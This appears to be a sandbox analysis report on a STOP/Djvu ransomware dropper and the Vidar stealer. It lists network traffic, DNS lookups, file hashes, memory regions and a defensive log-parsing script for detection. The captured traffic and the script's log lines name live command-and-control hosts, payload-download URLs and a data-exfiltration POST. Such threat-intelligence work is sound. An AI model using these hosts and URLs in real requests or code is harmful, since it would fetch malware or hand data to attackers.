      GET http://195.201.253.168/75b38583a079a9212c1fa894fd1b945f

      HTTP Response

      200

      HTTP Request

      GET http://195.201.253.168/archive.zip

      HTTP Response

      200

      HTTP Request

      POST http://195.201.253.168/

      HTTP Response

      200
    • 8.8.8.8:53
      api.2ip.ua
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      56 B
      72 B
      1
      1

      DNS Request

      api.2ip.ua

      DNS Response

      162.0.217.254

    • 8.8.8.8:53
      colisumy.com
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      58 B
      218 B
      1
      1

      DNS Request

      colisumy.com

      DNS Response

      201.252.19.77
      2.180.10.7
      211.171.233.129
      211.119.84.111
      123.231.118.19
      190.224.203.37
      189.232.28.79
      187.147.229.14
      92.83.236.139
      185.12.79.25

    • 8.8.8.8:53
      zexeq.com
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      55 B
      215 B
      1
      1

      DNS Request

      zexeq.com

      DNS Response

      61.253.71.111
      181.4.66.66
      124.43.19.179
      177.254.85.20
      189.186.91.50
      181.230.206.248
      200.119.114.13
      187.147.229.14
      180.94.152.232
      175.119.10.231

    • 8.8.8.8:53
      t.me
      dns
      build2.exe
      50 B
      66 B
      1
      1

      DNS Request

      t.me

      DNS Response

      149.154.167.99

    • 8.8.8.8:53
      steamcommunity.com
      dns
      build2.exe
      64 B
      80 B
      1
      1

      DNS Request

      steamcommunity.com

      DNS Response

      23.197.146.96
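The traffic above splits cleanly into the two families. The dropper talks with a bare "Microsoft Internet Explorer" User-Agent: two geo lookups at api.2ip.ua (both answered 429, and the sample fetched both payloads anyway, so a failing geolocation call is not a kill switch), the STOP/Djvu check-in to get.php with a 32-hex "pid" and first=true, and the build2.exe/build3.exe downloads. build2.exe (Vidar) then resolves its C2 from a dead drop (the Steam profile, with t.me also contacted over TLS), fetches its profile by the 32-hex botnet ID, pulls archive.zip (the Firefox/NSS DLLs that appear as \ProgramData\mozglue.dll and nss3.dll under Downloads) and posts the stolen data as an 82929-byte multipart upload. The script below is an added example for this page, not sandbox code; it reconstructs that sequence from constructed proxy-log lines whose values are copied from the report. The pipe-separated log format and the name "sample.exe" (standing in for the 64-hex dropper) are assumptions for the demo.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed lines: process|method|url|user-agent|request Content-Length (0 if none).
LOG = """\
sample.exe|GET|https://api.2ip.ua/geo.json|Microsoft Internet Explorer|0
sample.exe|GET|https://api.2ip.ua/geo.json|Microsoft Internet Explorer|0
sample.exe|GET|http://colisumy.com/dl/build2.exe|Microsoft Internet Explorer|0
sample.exe|GET|http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true|Microsoft Internet Explorer|0
sample.exe|GET|http://zexeq.com/files/1/build3.exe|Microsoft Internet Explorer|0
build2.exe|GET|https://steamcommunity.com/profiles/76561199520592470|Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0|0
build2.exe|GET|http://195.201.253.168/75b38583a079a9212c1fa894fd1b945f|Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0|0
build2.exe|GET|http://195.201.253.168/archive.zip|Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0|0
build2.exe|POST|http://195.201.253.168/|Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0|82929
"""

HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)
DEAD_DROPS = ("steamcommunity.com", "t.me")      # legitimate services abused to publish the C2 address
PUBLIC_SERVICES = DEAD_DROPS + ("api.2ip.ua",)   # hunt on these, do not blocklist them


def _split(url):
    u = urlparse(url)
    return {"host": u.hostname, "path": u.path, "query": parse_qs(u.query)}


def parse_log(text):
    rows = []
    for line in text.splitlines():
        proc, method, url, ua, clen = line.split("|")
        rows.append({"proc": proc, "method": method, "url": url, "ua": ua,
                     "clen": int(clen), **_split(url)})
    return rows


def djvu_checkins(rows):
    """STOP/Djvu check-in: get.php?pid=<32 hex>&first=true under the bare IE user-agent."""
    out = []
    for r in rows:
        pid = r["query"].get("pid", [""])[0]
        if (r["path"].endswith("/get.php") and HEX32.match(pid)
                and r["query"].get("first") == ["true"]
                and r["ua"] == "Microsoft Internet Explorer"):
            out.append((r["host"], pid))
    return out


def vidar_sequence(rows, proc):
    """Label the stealer's requests with the stage they belong to, in the order seen."""
    stages = []
    for r in rows:
        if r["proc"] != proc:
            continue
        if r["host"] in DEAD_DROPS:
            stages.append(("dead_drop", r["host"]))
        elif HEX32.match(r["path"].lstrip("/")):
            stages.append(("profile_fetch", r["path"].lstrip("/")))
        elif r["path"].endswith("archive.zip"):
            stages.append(("dependencies", r["host"]))
        elif r["method"] == "POST" and r["clen"] > 0:
            stages.append(("exfil_post", r["clen"]))     # bytes leaving the host
    return stages


def payload_downloads(rows):
    return [r["url"] for r in rows if r["path"].lower().endswith(".exe")]


def hosts_to_block(rows):
    """Every host touched, minus the public services that would only cause collateral damage."""
    return sorted({r["host"] for r in rows} - set(PUBLIC_SERVICES))


if __name__ == "__main__":
    rows = parse_log(LOG)
    print("djvu check-ins :", djvu_checkins(rows))
    print("payloads       :", payload_downloads(rows))
    print("vidar stages   :", vidar_sequence(rows, "build2.exe"))
    print("block          :", hosts_to_block(rows))
```

The check-in rule keys on the combination (get.php path, 32-hex pid, first=true, the exact "Microsoft Internet Explorer" agent string) rather than on zexeq.com, because the domain rotates between builds while the beacon shape does not; likewise the profile fetch is matched on a bare 32-hex path so it survives a change of C2 IP. The dead-drop hosts are kept out of the blocklist on purpose: matching on a Steam profile or Telegram URL followed within seconds by a raw-IP fetch of a 32-hex path is the useful signal.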

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      2KB

      MD5

      12cf3f7c5b0a343d46a960e36374432e

      SHA1

      c4385cb8e91123bbcee01892433bc8b0c3377167

      SHA256

      6dc7d2f12c7ed75825418011d67ecc0abb35ac3a65dc4582b9ecf8ee061bf901

      SHA512

      7c783a5771b810ff5925d4de6dbec8fd89ff8622cc13da40afc7df9f3f369f9e835b9b0ee84b7dcec0c8253e6c16371a36405e50ec214291944d2ddb36a036c2

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      1KB

      MD5

      1f741b0c2176fb8677c5ed12d315afde

      SHA1

      fc09a6bbb2e86a5f5751c026fc400391b977232e

      SHA256

      6cf6b1b5c22df0dfa38b04c358821cacc893c22e18e1781d1c85e70933a7e370

      SHA512

      7c76250ce7215ac900532ff6d7140251af587724c161d8163bfe8a32ecd21d93c8c6401560ce49c9b91f8fb40619b842a0f574599ef50422c57de52c0ae0e285

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      488B

      MD5

      2bf5c0b16e58c874fa919decb5ed984e

      SHA1

      be05f701fbc944cd84421cd22c6d5524ece6a6b4

      SHA256

      ec5541307c9d9fdd6495c1cac0b0ef940f718ad1ed43ba92ca13f03af7dd402f

      SHA512

      3694e5f2a5b280b112b5c2d0cb9d019b6b85af0993f0ded5511cec72c4dd927a3570fbc1703d2667153a4b3216552054a7e792d8607ae9c6f28b7573b3464f86

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      6a1606ca88442aa58ba9d99fa220d6c2

      SHA1

      af835708242ccd99696b9a1459121cdfb74ef1bf

      SHA256

      8c37c7ea8cbce8f05934ba57f402fe3c4050f1e7379f33c84be37a3d5a868a33

      SHA512

      91fb5cebd0c03d7825d97a71d5e2bd7627ea3ad2eb88a6bd18fe63cd9009e724d8a2768306c5a2075194d8b437edf0cbb93a77aa37ffec4b31f4d69b5af12bf9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      482B

      MD5

      fa453e29160487ff641297edbc923b32

      SHA1

      0343ed62427295734f924723766acb3617a2a9b8

      SHA256

      1c2f58c3c740016c84eef34b4b2895a9716a6225f8c928a5f4ed12425cec6efd

      SHA512

      4039e8879d42c44d983d7a46abd78a9153b3c985441483400280fc54e065d53303151a2506f1843d82a7a1620217d1a802efd48135aecae113fa501d71504fc7

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe

      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe

      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    • C:\Users\Admin\AppData\Local\Temp\Cab2DD7.tmp

      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

      d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

    • C:\Users\Admin\AppData\Local\Temp\Tar2F7F.tmp

      Filesize

      164KB

      MD5

      4ff65ad929cd9a367680e0e5b1c08166

      SHA1

      c0af0d4396bd1f15c45f39d3b849ba444233b3a2

      SHA256

      c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

      SHA512

      f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

    • C:\Users\Admin\AppData\Local\c23005e9-e7be-4060-a099-138c38cb43aa\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe

      Filesize

      783KB

      MD5

      2b1d02748bbf2a293604986d1e694a44

      SHA1

      be2d8db989a9c0797991e27ef80044ba36b50f1d

      SHA256

      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8

      SHA512

      e61bd9a6de336c5d3bd47aa9efba7dcafa55e827bb3627f2ca5e7714bb8458560f01b0806fc8450bab1a9ecafd253156c395bd3680ed924469d78a35961c4257

    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    • \ProgramData\mozglue.dll

      Filesize

      593KB

      MD5

      c8fd9be83bc728cc04beffafc2907fe9

      SHA1

      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

      SHA256

      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

      SHA512

      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    • \ProgramData\nss3.dll

      Filesize

      2.0MB

      MD5

      1cc453cdf74f31e4d913ff9c10acdde2

      SHA1

      6e85eae544d6e965f15fa5c39700fa7202f3aafe

      SHA256

      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

      SHA512

      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    • \Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe

      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

    • \Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe

      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    • memory/848-56-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/848-59-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/848-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/848-60-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/848-95-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/936-58-0x00000000006D0000-0x00000000007EB000-memory.dmp

      Filesize

      1.1MB

    • memory/936-54-0x0000000000320000-0x00000000003B1000-memory.dmp

      Filesize

      580KB

    • memory/1324-225-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1324-295-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-230-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-339-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-232-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-226-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-337-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-336-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1324-296-0x0000000061E00000-0x0000000061EF3000-memory.dmp

      Filesize

      972KB

    • memory/1376-204-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-244-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-208-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-203-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-202-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-105-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-210-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-211-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1376-231-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/1728-96-0x0000000000330000-0x00000000003C1000-memory.dmp

      Filesize

      580KB

    • memory/2004-229-0x0000000000220000-0x0000000000282000-memory.dmp

      Filesize

      392KB
